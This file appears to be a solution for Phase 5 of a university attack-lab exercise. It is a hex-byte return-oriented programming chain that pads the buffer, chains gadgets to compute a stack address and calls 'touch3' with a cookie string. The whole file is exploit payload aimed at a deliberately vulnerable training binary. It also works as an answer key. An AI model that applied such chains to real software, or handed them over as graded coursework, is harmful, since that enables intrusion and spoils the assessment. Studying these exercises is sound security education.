/* Phase 5 */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 /* 40 nops */
cc 19 40 00 00 00 00 00 /* gadget1: popq %rax */
20 00 00 00 00 00 00 00 /* constant: 32 */
dd 19 40 00 00 00 00 00 /* gadget2: movl %eax, %edx */
34 1a 40 00 00 00 00 00 /* gadget3: movl %edx, %ecx */
27 1a 40 00 00 00 00 00 /* gadget4: movl %ecx, %esi */
/* now %esi = 32 */
06 1a 40 00 00 00 00 00 /* gadget5: movq %rsp, %rax */
c5 19 40 00 00 00 00 00 /* gadget6: movq %rax, %rdi */
/* now %rdi = rsp */
d6 19 40 00 00 00 00 00 /* gadget7: lea (%rdi,%rsi,1), %rax */
c5 19 40 00 00 00 00 00 /* gadget8: movq %rax, %rdi */
fa 18 40 00 00 00 00 00 /* Address for touch3 */
35 39 62 39 39 37 66 61 00 /* String, Address stored in rdi*/
